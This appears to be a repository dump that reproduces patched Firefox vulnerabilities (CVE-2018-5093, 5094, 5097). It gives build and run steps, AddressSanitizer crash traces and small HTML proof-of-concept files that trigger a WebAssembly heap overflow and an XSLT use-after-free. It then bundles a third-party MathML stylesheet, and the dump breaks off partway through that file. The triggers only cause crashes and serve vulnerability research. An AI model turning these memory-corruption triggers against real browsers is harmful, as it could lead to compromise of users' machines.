 8 | user_pref("browser.shell.checkDefaultBrowser", false);
 9 | user_pref("browser.sessionstore.resume_from_crash", false);
10 | user_pref("browser.tabs.warnOnOpen", false);
11 | user_pref("browser.tabs.warnOnClose", false);
12 | user_pref("security.insecure_field_warning.contextual.enabled", false);
13 | user_pref("security.insecure_password.ui.enabled", false);


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5093/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5093/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5093/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2018-5093
 2 | 
 3 | ## Heap-buffer-overflow READ 8 · js::WasmTableObject::getImpl
 4 | 
 5 | A heap buffer overflow vulnerability may occur in WebAssembly during Memory/Table resizing, resulting in a potentially exploitable crash.
 6 | 
 7 | **Type:** heap overflow
 8 | 
 9 | **FF version:** 57.0 (ASAN build)
10 | 
11 | 
12 | running  ```./mach run --debug --disable-e10s --fuzzing-safe ../CVE-2018-5093/crash.html```
13 | 
14 | gives:
15 | 
16 | ```
17 | =================================================================
18 | ==75534==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020004d2920 at pc 0x7fffdba21012 bp 0x7fffffff1050 sp 0x7fffffff1040
19 | READ of size 8 at 0x6020004d2920 thread T0
20 |     #0 0x7fffdba21011 in js::WasmTableObject::getImpl(JSContext*, JS::CallArgs const&) /home/clover/firefox-57.0/js/src/wasm/WasmJS.cpp:1720
21 |     #1 0x7fffdba37560 in CallNonGenericMethod<IsTable, js::WasmTableObject::getImpl> /home/clover/firefox-57.0/objdir-ff-asan/dist/include/js/CallNonGenericMethod.h:100
22 |     #2 0x7fffdba21692 in js::WasmTableObject::get(JSContext*, unsigned int, JS::Value*) /home/clover/firefox-57.0/js/src/wasm/WasmJS.cpp:1742
23 |     #3 0x7fffd9f92250 in js::CallJSNative(JSContext*, bool (*)(JSContext*, unsigned int, JS::Value*), JS::CallArgs const&) (/home/clover/firefox-57.0/objdir-ff-asan/dist/bin/libxul.so+0x14abb250)
24 |     #4 0x7fffd9f21173 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&, js::MaybeConstruct) /home/clover/firefox-57.0/js/src/vm/Interpreter.cpp:495
25 |     #5 0x7fffd9f219eb in InternalCall /home/clover/firefox-57.0/js/src/vm/Interpreter.cpp:540
26 |     #6 0x7fffd9f21ac5 in js::CallFromStack(JSContext*, JS::CallArgs const&) /home/clover/firefox-57.0/js/src/vm/Interpreter.cpp:546
27 | 
28 |     
29 | ```
30 | 
31 | Reference:
32 | [1] https://bugzilla.mozilla.org/show_bug.cgi?id=1415291


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5093/crash.html:
--------------------------------------------------------------------------------
1 | <html>
2 | <script>
3 | v = new WebAssembly.Table({
4 |   element: "anyfunc"
5 | });
6 | v.get(1);
7 | </script>


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5094/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5094/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5094/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2018-5094
 2 | 
 3 | A heap buffer overflow vulnerability may occur in WebAssembly when "shrinkElements" is called followed by garbage collection on memory that is now uninitialized. This results in a potentially exploitable crash. This vulnerability affects Firefox < 58.
 4 | 
 5 | **Type:** heap overflow
 6 | 
 7 | **FF version:** 57.0 (ASAN build)
 8 | 
 9 | Build configuration:
10 | 	- --enable-address-sanitizer
11 | 	- --disable-jemalloc
12 | 	- --disable-crashreporter
13 | 	- --disable-elf-hack
14 | 	- --enable-debug-symbols
15 | 	- --disable-install-strip
16 | 	- --enable-optimize=-O2
17 | 	- --disable-debug
18 | 	- --enable-valgrind
19 | 	- --disable-profiling
20 | 	- --disable-tests
21 | 	- --enable-gczeal
22 | 
23 | 
24 | running  ```./mach run --debug --disable-e10s --ion-eager --fuzzing-safe ../CVE-2018-5094/crash.html```
25 | 
26 | gives:
27 | 
28 | ```
29 | =================================================================
30 | ==3034==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6020003616c0 at pc 0x7fffe613256b bp 0x7ffffffe7910 sp 0x7ffffffe7900
31 | READ of size 8 at 0x6020003616c0 thread T0
32 |     #0 0x7fffe613256a in js::WasmTableObject::getImpl(JSContext*, JS::CallArgs const&) /home/clover/firefox-57.0/js/src/wasm/WasmJS.cpp:1720
33 |     #1 0x7fffe61328ea in CallNonGenericMethod<IsTable, js::WasmTableObject::getImpl> /home/clover/firefox-57.0/objdir-ff-asan/dist/include/js/CallNonGenericMethod.h:100
34 |     #2 0x7fffe61328ea in js::WasmTableObject::get(JSContext*, unsigned int, JS::Value*) /home/clover/firefox-57.0/js/src/wasm/WasmJS.cpp:1742
35 | 
36 | ```
37 |     
38 | Reference:
39 | [1] https://bugzilla.mozilla.org/show_bug.cgi?id=1415291


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5094/crash.html:
--------------------------------------------------------------------------------
1 | <html>
2 | <body>
3 | <script src="./crash.js"> </script>
4 | </body>
5 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5097/.DS_Store:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ZihanYe/web-browser-vulnerabilities/ce0cef3971119d7916c7170c3ec377b0b3a000ac/Firefox/CVE-2018-5097/.DS_Store


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5097/README.md:
--------------------------------------------------------------------------------
 1 | # CVE-2018-5097
 2 | 
 3 | heap-use-after-free in txNameTest::matches
 4 | 
 5 | ## Firefox
 6 | 
 7 | I tested this vulnerability with Firefox 56.0 ASAN build downloaded from [here](https://ftp.mozilla.org/pub/firefox/releases/56.0/source/).
 8 | 
 9 | To build it, I had to downgrade my rust to 1.19.0 according to [Firefox's Rust Update policy](https://wiki.mozilla.org/Rust_Update_Policy_for_Firefox).
10 | 
11 | In order for making Firefox opening the PoC file without any other disruption, I used some customized preferences. Preferences can be set in ```about:config``` page in Firefox by searching for preferences listed in [user.js](https://github.com/ZihanYe/Firefox-Exploitation/blob/master/Manual%20Exploitation/CVE-2017-7828/user.js), or if you are running Firefox in headless mode (```--headless```), then create a new profile like this:
12 | 
13 | ```
14 | mkdir -p /path/to/firefox/build/directory/tmp/customized_profile
15 | ```
16 | and move [user.js]() under the new profile folder.
17 | 
18 | Run firefox with options ```--headless --no-remote --profile /path/to/the/profile/folder/just/created file:///path/to/crash.html```
19 | 
20 | 
21 | ## PoC
22 | 
23 | From the ASAN report, the freed object is an nsTextNode, allocated in
24 | 
25 | ```
26 | nsXMLContentSink::FlushText(bool) /home/ug16zy2/firefox-56.0/dom/xml/nsXMLContentSink.cpp:772
27 | ```
28 | 
29 | Setting breakpoints on ``` nsTextNode::~nsTextNode()```, we can see a sequence of text nodes being freed.
30 | 
31 | Then ```txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) in ./dom/xslt/xslt/txMozillaXSLTProcessor.cpp``` is invoked at some point. Inside this function:
32 | 
33 | ```
34 | txExecutionState es(mStylesheet, IsLoadDisabled());
35 | nsresult rv = es.init(*sourceNode, &mVariables);
36 | ```
37 | 
38 | a ```txExecutionState``` is created, which has a pointer ```(txNodeSetContext*) mEvalContext``` to a ```txNodeSetContext```, which then has a pointer ```(RefPtr<txNodeSet>) mContextSet``` referencing a ```txNodeSet```. ```mContextSet``` has a pointer (**dangling pointer**) to the freed text node.
39 | 
40 | Then ```txXSLTProcessor``` is executed and it tries to apply templates on each items in ```txNodeSet```, which dereferences the dangling pointer at some point, for example:
41 | 
42 | ```
43 |     #6 0x7fe8711b3514 in txStylesheet::findTemplate(txXPathNode const&, txExpandedName const&, txIMatchContext*, txStylesheet::ImportFrame*, txInstruction**, txStylesheet::ImportFrame**) /home/worker/workspace/build/src/dom/xslt/xslt/txStylesheet.cpp:133:45
44 |     #7 0x7fe87117045a in txApplyTemplates::execute(txExecutionState&) /home/worker/workspace/build/src/dom/xslt/xslt/txInstructions.cpp:85:26
45 |     #8 0x7fe8711d347d in txXSLTProcessor::execute(txExecutionState&) /home/worker/workspace/build/src/dom/xslt/xslt/txXSLTProcessor.cpp:49:21
46 |     #9 0x7fe87119ce9a in txMozillaXSLTProcessor::TransformToDoc(nsIDOMDocument**, bool) 
47 | ```
48 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5097/crash.html:
--------------------------------------------------------------------------------
 1 | <script>
 2 | function start() {
 3 | 	o0=document;
 4 | 	document.documentElement.innerHTML="";;
 5 | 	o16=o0.createElement('iframe');
 6 | 	o16.src='math.xml';
 7 | 	o19=o0.createElement('element');
 8 | 	o22=document.documentElement.querySelector('*:not([id])');
 9 | 	document.documentElement.appendChild(o16);
10 | 	o33=o0.createElement('marquee');
11 | 	o33.addEventListener('DOMAttrModified',fun0);
12 | 	o33.style.objectPosition='341cm';
13 | }
14 | function fun0() {
15 | 	o16.src='javascript:window.top.fun1(document)';
16 | 	o39=o0.createElement('style');
17 | 	o22.appendChild(o39);
18 | }
19 | function fun1(a) {
20 | 	o52=a;
21 | 	o53=o52.querySelector('*:not([id])');
22 | 	o53.id='id7';
23 | 	o39.replaceWith(undefined,o19);
24 | 	o79=o52.querySelector('*:not([id])');
25 | 	o19.innerHTML='<script>window.top.fun2()</'+'script>';
26 | 	o79.before(o22);
27 | }
28 | function fun2() {
29 | 	o53.textContent="a";
30 | 	FuzzingFunctions.garbageCollect();
31 | 	FuzzingFunctions.cycleCollect();
32 | 	FuzzingFunctions.garbageCollect();
33 | 	FuzzingFunctions.cycleCollect();
34 | 	// fuzzPriv.GC();fuzzPriv.CC();fuzzPriv.GC();fuzzPriv.CC();
35 | }
36 | </script>
37 | <body onload="start()"></body>
38 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5097/math.xml:
--------------------------------------------------------------------------------
 1 | <?xml-stylesheet type="text/xsl" href="mathml.xsl"?>
 2 | <math xmlns="http://www.w3.org/1998/Math/MathML">
 3 | <matrix id="element3">
 4 |   <matrixrow>
 5 |     <cn> 0 </cn> <cn> 1 </cn> <cn> 0 </cn>
 6 |   </matrixrow>
 7 |   <matrixrow id="element0">
 8 |     <cn id="element1"> 0 </cn> <cn id="element2"> 0 </cn> <cn> 1 </cn>
 9 |   </matrixrow>
10 |   <matrixrow>
11 |     <cn> 1 </cn> <cn> 0 </cn> <cn> 0 </cn>
12 |   </matrixrow>
13 | </matrix>
14 | </math>
15 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5097/mathml.xsl:
--------------------------------------------------------------------------------
 1 | <xsl:stylesheet
 2 |   version="1.0"
 3 |   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
 4 |   xmlns:msxsl="urn:schemas-microsoft-com:xslt"
 5 |   xmlns:fns="http://www.w3.org/2002/Math/preference"
 6 |   xmlns:mml="http://www.w3.org/1998/Math/MathML"
 7 |   extension-element-prefixes="msxsl fns"
 8 | >
 9 | 
10 | <!--
11 | Copyright David Carlisle 2001, 2002.
12 | 
13 | Use and distribution of this code are permitted under the terms of the <a
14 | href="http://www.w3.org/Consortium/Legal/copyright-software-19980720"
15 | >W3C Software Notice and License</a>.
16 | -->
17 | 
18 | <xsl:include href="ctop.xsl"/>
19 | <xsl:include href="pmathml.xsl"/>
20 | 
21 | <xsl:output/>
22 | 
23 | <xsl:template match="/">
24 | <xsl:choose>
25 | <xsl:when test="system-property('xsl:vendor')='Transformiix'">
26 | <xsl:apply-templates mode="c2p"/>
27 | </xsl:when>
28 | <!-- not working, currently
29 | <xsl:when test="system-property('xsl:vendor')='Microsoft' and /*/@fns:renderer='css'">
30 | <xsl:variable name="pmml">
31 | <xsl:apply-templates mode="c2p"/>
32 | </xsl:variable>
33 | <xsl:apply-templates select="msxsl:node-set($pmml)/node()"/>
34 | </xsl:when>
35 | -->
36 | <xsl:otherwise>
37 | 
38 | <xsl:apply-templates/>
39 | </xsl:otherwise>
40 | </xsl:choose>
41 | </xsl:template> 
42 | </xsl:stylesheet>
43 | 
44 | 


--------------------------------------------------------------------------------
/Firefox/CVE-2018-5097/pmathml.xsl:
--------------------------------------------------------------------------------
  1 | <xsl:stylesheet
  2 |   version="1.0"
  3 |   xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
  4 |   xmlns:mml="http://www.w3.org/1998/Math/MathML"
  5 |   xmlns:h="http://www.w3.org/1999/xhtml"
  6 |   xmlns="http://www.w3.org/1999/xhtml"
  7 |   xmlns:msxsl="urn:schemas-microsoft-com:xslt"
  8 |   xmlns:fns="http://www.w3.org/2002/Math/preference"
  9 |   xmlns:doc="http://www.dcarlisle.demon.co.uk/xsldoc"
 10 |   xmlns:ie5="http://www.w3.org/TR/WD-xsl"
 11 |   exclude-result-prefixes="h ie5 fns msxsl fns doc"
 12 |   extension-element-prefixes="msxsl fns doc"
 13 | >
 14 | 
 15 | <!--
 16 | $Id: pmathml.xsl,v 1.8 2003/06/23 14:46:44 davidc Exp $
 17 | 
 18 | Copyright David Carlisle 2001, 2002.
 19 | 
 20 | Use and distribution of this code are permitted under the terms of the <a
 21 | href="http://www.w3.org/Consortium/Legal/copyright-software-19980720"
 22 | >W3C Software Notice and License</a>.
 23 | -->
 24 | 
 25 | <!-- MathPlayer mpdialog code for contributed by
 26 |      Jack Dignan and Robert Miner, both of Design Science.
 27 | -->
 28 | 
 29 | <xsl:output method="xml" omit-xml-declaration="yes"  />
 30 | 
 31 | <ie5:if doc:id="iehack" test=".">
 32 |     <ie5:eval no-entities="t">'&lt;!--'</ie5:eval>
 33 | </ie5:if>
 34 | 
 35 | 
 36 | <fns:x name="mathplayer" o="MathPlayer.Factory.1">
 37 | <object id="mmlFactory" 
 38 |         classid="clsid:32F66A20-7614-11D4-BD11-00104BD3F987">
 39 | </object>
 40 | <?import namespace="mml" implementation="#mmlFactory"?>
 41 | </fns:x>
 42 | 
 43 | <fns:x name="techexplorer" o="techexplorer.AxTchExpCtrl.1">
 44 | <object id="mmlFactory" classid="clsid:0E76D59A-C088-11D4-9920-002035EFB1A4">
 45 | </object>
 46 | <?import namespace="mml" implementation="#mmlFactory"?>
 47 | </fns:x>
 48 | 
 49 | 
 50 | <!-- SCRIPT not script due to weird mozilla bug
 51 | http://bugzilla.mozilla.org/show_bug.cgi?id=158457
 52 | -->
 53 | 
 54 | <fns:x name="css" o="Microsoft.FreeThreadedXMLDOM">
 55 | <SCRIPT for="window" event="onload">
 56 | var xsl = new ActiveXObject("Microsoft.FreeThreadedXMLDOM");
 57 | xsl.async = false;
 58 | xsl.validateOnParse = false;
 59 | xsl.load("pmathmlcss.xsl");
 60 | var xslTemplate = new ActiveXObject("MSXML2.XSLTemplate.3.0");
 61 | xslTemplate.stylesheet=xsl.documentElement;
 62 | var xslProc = xslTemplate.createProcessor();
 63 | xslProc.input = document.XMLDocument;
 64 | xslProc.transform();
 65 | var str = xslProc.output;
 66 | <!-- work around bug in IE6 under Win XP, RM 6/5/2002 -->
 67 | var repl = "replace";
 68 | if (window.navigator.appVersion.match(/Windows NT 5.1/)) { repl = ""; }
 69 | var newDoc = document.open("text/html", repl);
 70 | newDoc.write(str);
 71 | </SCRIPT>
 72 | </fns:x>
 73 | 
 74 | 
 75 | <h:p>
 76 | in mpdialog mode, we just write out some JavaScript to display 
 77 | dialog to the reader asking whether they want to install MathPlayer 
 78 | Depending on the response we get, we then instantiate an XSL processor
 79 | and reprocess the doc, passing $secondpass according to the
 80 | reader response.
 81 | </h:p>
 82 | <h:p>Using d-o-e is fairly horrible, but this code is only for IE
 83 | anyway, and we need to force HTML semantics in this case.</h:p>
 84 | 
 85 | <xsl:variable name="mpdialog">
 86 | var cookieName = "MathPlayerInstall=";
 87 | function MPInstall(){
 88 |  var showDialog=true;
 89 |  var c = document.cookie;
 90 |  var i = c.indexOf(cookieName);
 91 |  if (i >= 0) {
 92 |   if ( c.substr(i + cookieName.length, 1) >= 2) { showDialog=false; }
 93 |  }
 94 |  if (showDialog) {
 95 |   MPDialog();
 96 |   c = document.cookie;
 97 |   i = c.indexOf(cookieName);
 98 |  }
 99 |  if (i >= 0) return c.substr(i + cookieName.length, 1);
100 |  else return null;
101 | }
102 | 
103 | function MPDialog() {
104 |  var vArgs="";
105 |  var sFeatures="dialogWidth:410px;dialogHeight:190px;help:off;status:no";
106 |  var text = "";
107 |  text += "javascript:document.write('"
108 |  text += '&lt;script>'
109 |  text += 'function fnClose(v) { '
110 |  text += 'var exp = new Date();'
111 |  text += 'var thirtyDays = exp.getTime() + (30 * 24 * 60 * 60 * 1000);'
112 |  text += 'exp.setTime(thirtyDays);'
113 |  text += 'var cookieProps = ";expires=" + exp.toGMTString();'
114 |  text += 'if (document.forms[0].dontask.checked) v+=2;'
115 |  text += 'document.cookie="' + cookieName + '"+v+cookieProps;'
116 |  text += 'window.close();'
117 |  text += '}'
118 |  text += '&lt;/' + 'script>'
119 |  text += '&lt;head>&lt;title>Install MathPlayer?&lt;/title>&lt;/head>'
120 |  text += '&lt;body bgcolor="#D4D0C8">&lt;form>'
121 |  text += '&lt;table cellpadding=10 style="font-family:Arial;font-size:10pt" border=0 width=100%>'
122 |  text += '&lt;tr>&lt;td align=left>This page requires Design Science\\\'s MathPlayer&amp;trade;.&lt;br>'
123 |  text += 'Do you want to download and install MathPlayer?&lt;/td>&lt;/tr>';
124 |  text += '&lt;tr>&lt;td align=center>&lt;input type="checkbox" name="dontask">'
125 |  text += 'Don\\\'t ask me again&lt;/td>&lt;/tr>'
126 |  text += '&lt;tr>&lt;td align=center>&lt;input id=yes type="button" value=" Yes "'
127 |  text += ' onClick="fnClose(1)">&amp;nbsp;&amp;nbsp;&amp;nbsp;'
128 |  text += '&lt;input type="button" value="  No  " onClick="fnClose(0)">&lt;/td>&lt;/tr>'
129 |  text += '&lt;/table>&lt;/form>';
130 |  text += '&lt;/body>'
131 |  text += "')"
132 |  window.showModalDialog( text , vArgs, sFeatures );
133 | }
134 | 
135 | function WaitDialog() {
136 |  var vArgs="";
137 |  var sFeatures="dialogWidth:510px;dialogHeight:150px;help:off;status:no";
138 |  var text = "";
139 |  text += "javascript:document.write('"
140 |  text += '&lt;script>'
141 |  text += 'window.onload=fnLoad;'
142 |  text += 'function fnLoad() {document.forms[0].yes.focus();}'
143 |  text += 'function fnClose(v) { '
144 |  text += 'window.returnValue=v;'
145 |  text += 'window.close();'
146 |  text += '}'
147 |  text += '&lt;/' + 'script>'
148 |  text += '&lt;head>&lt;title>Wait for Installation?&lt;/title>&lt;/head>'
149 |  text += '&lt;body bgcolor="#D4D0C8" onload="fnLoad()">&lt;form>&lt;'
150 |  text += 'table cellpadding=10 style="font-family:Arial;font-size:10pt" border=0 width=100%>'
151 |  text += '&lt;tr>&lt;td align=left>Click OK once MathPlayer is installed '
152 |  text += 'to refresh the page.&lt;br>'
153 |  text += 'Click Cancel to view the page immediately without MathPlayer.&lt;/td>&lt;/tr>';
154 |  text += '&lt;tr>&lt;td align=center>&lt;input id=yes type="button" '
155 |  text += 'value="   OK   " onClick="fnClose(1)">&amp;nbsp;&amp;nbsp;&amp;nbsp;'
156 |  text += '&lt;input type="button" value="Cancel" onClick="fnClose(0)">&lt;/td>&lt;/tr>'
157 |  text += '&lt;/table>&lt;/form>';
158 |  text += '&lt;/body>'
159 |  text += "')"
160 |  return window.showModalDialog( text , vArgs, sFeatures );
161 | }
162 | 
163 | var result = MPInstall();
164 | 
165 | var action = "fallthrough";
166 | if (result == 1 || result == 3) {
167 |  window.open("http://www.dessci.com/webmath/mathplayer");
168 |  var wait = WaitDialog();
169 |  if ( wait == 1) {
170 |   action =  "install";
171 |   document.location.reload();
172 | 
173 |  }
174 | }
175 | if (action == "fallthrough") {
176 | var xsl = new ActiveXObject("Microsoft.FreeThreadedXMLDOM");
177 | xsl.async = false;
178 | xsl.validateOnParse = false;
179 | xsl.load("pmathmlcss.xsl");
180 | var xslTemplate = new ActiveXObject("MSXML2.XSLTemplate.3.0");
181 | xslTemplate.stylesheet=xsl.documentElement;
182 | var xslProc = xslTemplate.createProcessor();
183 | xslProc.input = document.XMLDocument;
184 | 
185 | xslProc.transform();
186 | var str = xslProc.output;
187 | <!-- work around bug in IE6 under Win XP, RM 6/5/2002 -->
188 | var repl = "replace";
189 | if (window.navigator.appVersion.match(/Windows NT 5.1/)) { repl = ""; }
190 | var newDoc = document.open("text/html", repl);
191 | newDoc.write(str);
192 | document.close();
193 | }
194 | </xsl:variable>
195 | 
196 | <fns:x name="mathplayer-dl" >mathplayer-dl</fns:x>
197 | 
198 | <fns:x name="techexplorer-plugin" >techexplorer-plugin</fns:x>
199 | 
200 | <xsl:variable name="root" select="/"/>
201 | 
202 | 
203 | 
204 | <xsl:param name="activex">
205 |    <xsl:choose>
206 |      <xsl:when test="/*/@fns:renderer='techexplorer-plugin'">techexplorer-plugin</xsl:when>
207 |      <xsl:when test="system-property('xsl:vendor')!='Microsoft'"/>
208 |      <xsl:otherwise>
209 | <xsl:variable name="docpref" select="document('')/*/fns:x[@name=$root/*/@fns:renderer][1]"/>
210 |      <xsl:choose>
211 |      <xsl:when test="$docpref='mathplayer-dl'">mathplayer-dl</xsl:when>
212 |      <xsl:when test="$docpref and fns:isinstalled(string($docpref/@o))='true'">
213 |            <xsl:copy-of select="$docpref/node()"/>
214 |      </xsl:when>
215 |      <xsl:otherwise>
216 |        <xsl:copy-of select="(document('')/*/fns:x[fns:isinstalled(string(@o))='true'])[1]/node()"/>
217 |      </xsl:otherwise>
218 |   </xsl:choose>
219 |      </xsl:otherwise>
220 |   </xsl:choose>
221 | </xsl:param>
222 | 
223 | <h:div doc:ref="iehack">
224 | <h:h3>IE5 hacks</h:h3>
225 | <h:p>This code will be ignored by an XSLT engine as a top level
226 | element in a foreign namespace. It will be executed by an IE5XSL
227 | engine and insert &lt;!-- into the output stream, ie the start of a
228 | comment. This will comment out all the XSLT code which will be copied
229 | to the output. A similar clause below will close this comment, it is
230 | then followed by the IE5XSL templates to be executed.</h:p>
231 | <h:p>This trick is due to Jonathan Marsh of Microsoft, and used in
232 | <h:a href="http://www.w3.org/TR/2001/WD-query-datamodel-20010607/xmlspec-ie-dm.xsl">the stylesheet for
233 | the XPath 2 data model draft</h:a>.</h:p>
234 | </h:div>
235 | 
236 | <h:h2>XSLT stylesheet</h:h2>
237 | <h:h3>MSXSL script block</h:h3>
238 | 
239 | <h:p>The following script block implements an extension function that
240 | tests whether a specified ActiveX component is known to the client.
241 | This is used below to test for the existence of MathML rendering
242 | components.</h:p>
243 | <msxsl:script language="JScript" implements-prefix="fns">
244 |     function isinstalled(ax) 
245 |     {
246 |     try {
247 |         var ActiveX = new ActiveXObject(ax);
248 |         return "true";
249 |     } catch (e) {
250 |         return "false";
251 |     }
252 | }
253 | </msxsl:script>
254 | 
255 | <h:p>The main bulk of this stylesheet is an identity transformation so...</h:p>
256 | <xsl:template match="*|comment()">
257 | <xsl:copy>
258 | <xsl:copy-of select="@*"/>
259 | <xsl:apply-templates/>
260 | </xsl:copy>
261 | </xsl:template>
262 | 
263 | 
264 | 
265 | <h:p>XHTML elements are copied sans prefix (XHTML is default namespace
266 | here, so these elements will still be in XHTML namespace</h:p>
267 | <xsl:template match="h:*">
268 | <xsl:element name="{local-name(.)}">
269 |  <xsl:copy-of select="@*"/>
270 | <xsl:apply-templates/>
271 | </xsl:element>
272 | </xsl:template>
273 | 
274 | <h:p>IE's treatment of XHTML as HTML needs a little help here...</h:p>
275 | <xsl:template match="h:br|h:hr">
276 | <xsl:choose>
277 | <xsl:when test="system-property('xsl:vendor')='Microsoft'">
278 |   <xsl:value-of disable-output-escaping="yes" select="concat('&lt;',local-name(.))"/>
279 |   <xsl:apply-templates mode="verb" select="@*"/>
280 |   <xsl:text disable-output-escaping="yes">&gt;</xsl:text>
281 | </xsl:when>
282 | <xsl:otherwise>
283 | <xsl:element name="{local-name(.)}">
284 |  <xsl:copy-of select="@*"/>
285 | <xsl:apply-templates/>
286 | </xsl:element>
287 | </xsl:otherwise>
288 | </xsl:choose>
289 | </xsl:template>
290 | 
291 | <h:p>This just ensures the mathml prefix declaration isn't copied from
292 | the source at this stage, so that the system will use the mml prefix
293 | coming from this stylesheet</h:p>
294 | <xsl:template match="h:html|html">
295 | <html>
296 | <xsl:copy-of select="@*[not(namespace-uri(.)='http://www.w3.org/2002/Math/preference')]"/>
297 | <xsl:apply-templates/>
298 | </html>
299 | </xsl:template>
300 | 
301 | <h:p>We modify the head element to add code to specify a Microsoft
302 | "Behaviour" if the behaviour component is known to the system.</h:p>
303 | <h:span doc:ref="mp">Test for MathPlayer (Design Science)</h:span>
304 | <h:span doc:ref="te">Test for Techexplorer (IBM)</h:span>
305 | <h:span doc:ref="ms"><h:div>Test for Microsoft. In this case we just
306 | output a small HTML file that executes a script that will re-process
307 | the source docuument with a different stylesheet. Doing things this
308 | way avoids the need to xsl:import the second stylesheet, which would
309 | very much increase the processing overhead of running this
310 | stylesheet.</h:div></h:span>
311 | <h:span doc:ref="other">Further tests (eg for netscape/mozilla) could
312 | be added here if necessary</h:span>
313 | <xsl:template match="h:head|head">
314 | <head>
315 | 
316 | <!-- new if for IE frames bug -->
317 | <xsl:if test="system-property('xsl:vendor')='Microsoft'">
318 | <xsl:if test="name(msxsl:node-set($activex)/*)=''">
319 | <object id="mmlFactory" 
320 |         classid="clsid:32F66A20-7614-11D4-BD11-00104BD3F987">
321 | </object>
322 | <xsl:processing-instruction name="import">
323 |  namespace="mml" implementation="#mmlFactory"
324 | </xsl:processing-instruction>
325 | </xsl:if>
326 | </xsl:if>
327 | 
328 | <xsl:choose>
329 | <xsl:when doc:id="mp" test="$activex='mathplayer-dl'">
330 |     <xsl:if test="fns:isinstalled('MathPlayer.Factory.1')='false'">
331 |      <SCRIPT for="window" event="onload">
332 |        <xsl:value-of select="$mpdialog" disable-output-escaping="yes"/>
333 |      </SCRIPT>
334 |     </xsl:if>
335 |    <xsl:copy-of select="document('')/*/fns:x[@name='mathplayer']"/>
336 | </xsl:when>
337 | <xsl:when doc:id="mp" test="not($activex='techexplorer-plugin') and system-property('xsl:vendor')='Microsoft'">
338 |   <xsl:copy-of select="$activex"/>
339 | </xsl:when>
340 | <xsl:otherwise doc:id="other">
341 | </xsl:otherwise>
342 | </xsl:choose>
343 |   <xsl:apply-templates/>
344 | </head>
345 | </xsl:template>
346 | 
347 | 
348 | <xsl:template match="mml:math" priority="22">
349 | <xsl:choose>
350 | <xsl:when test="$activex='techexplorer-plugin'">
351 | <embed  type="text/mathml" height="75" width="300">
352 | <xsl:attribute name="mmldata">
353 | <xsl:apply-templates mode="verb" select="."/>
354 | </xsl:attribute>
355 | </embed>
356 | </xsl:when>
357 | <xsl:otherwise>
358 | <xsl:element name="mml:{local-name(.)}">
359 |  <xsl:copy-of select="@*"/>
360 | <xsl:apply-templates/>
361 | </xsl:element>
362 | </xsl:otherwise>
363 | </xsl:choose>
364 | </xsl:template>
365 | 
366 | 
367 | <!-- squash annotation elements -->
368 | 
369 | 
370 | 
371 | <h:p>Somewhat bizarrely in an otherwise namespace aware system,
372 | Microsoft behaviours are defined to trigger off the
373 | <h:em>prefix</h:em> not the <h:em>Namespace</h:em>. In the code above
374 | we associated a MathML rendering behaviour (if one was found) with the
375 | prefix <h:code>mml:</h:code> so here we ensure that this is the prefix
376 | that actually gets used in the output.</h:p>
377 | <xsl:template match="mml:*">
378 | <xsl:element name="mml:{local-name(.)}">
379 |  <xsl:copy-of select="@*"/>
380 | <xsl:apply-templates/>
381 | </xsl:element>
382 | </xsl:template>
383 | 
384 | <h:p>Copy semantics element through in IE (so mathplayer gets to see
385 | mathplayer annotations, otherwise use first child or a presentation annotation.</h:p>
386 | <xsl:template match="mml:semantics">
387 | <xsl:choose>
388 |  <xsl:when test="system-property('xsl:vendor')='Microsoft'">
389 |    <xsl:element name="mml:{local-name(.)}">
390 |     <xsl:copy-of select="@*"/>
391 |     <xsl:apply-templates/>
392 |    </xsl:element>
393 |  </xsl:when>
394 |  <xsl:when test="mml:annotation-xml[@encoding='MathML-Presentation']">
395 |    <xsl:apply-templates select="mml:annotation-xml[@encoding='MathML-Presentation']/node()"/>  
396 |  </xsl:when>
397 |  <xsl:otherwise>
398 |    <xsl:apply-templates select="*[1]"/>  
399 |  </xsl:otherwise>
400 | </xsl:choose>
401 | </xsl:template>
402 | 
403 | <!-- a version of my old verb.xsl -->
404 | 
405 | <!-- non empty elements and other nodes. -->
406 | <xsl:template mode="verb" match="*[*]|*[text()]|*[comment()]|*[processing-instruction()]">
407 |   <xsl:value-of select="concat('&lt;',local-name(.))"/>
408 |   <xsl:apply-templates mode="verb" select="@*"/>
409 |   <xsl:text>&gt;</xsl:text>
410 |   <xsl:apply-templates mode="verb"/>
411 |   <xsl:value-of select="concat('&lt;/',local-name(.),'&gt;')"/>
412 | </xsl:template>
413 | 
414 | <!-- empty elements -->
415 | <xsl:template mode="verb" match="*">
416 |   <xsl:value-of select="concat('&lt;',local-name(.))"/>
417 |   <xsl:apply-templates mode="verb" select="@*"/>
418 |   <xsl:text>/&gt;</xsl:text>
419 | </xsl:template>
420 | 
421 | <!-- attributes
422 |      Output always surrounds attribute value by "
423 |      so we need to make sure no literal " appear in the value  -->
424 | <xsl:template mode="verb" match="@*">
425 |   <xsl:value-of select="concat(' ',local-name(.),'=')"/>
426 |   <xsl:text>"</xsl:text>
427 |   <xsl:call-template name="string-replace">
428 |     <xsl:with-param name="from" select="'&quot;'"/>
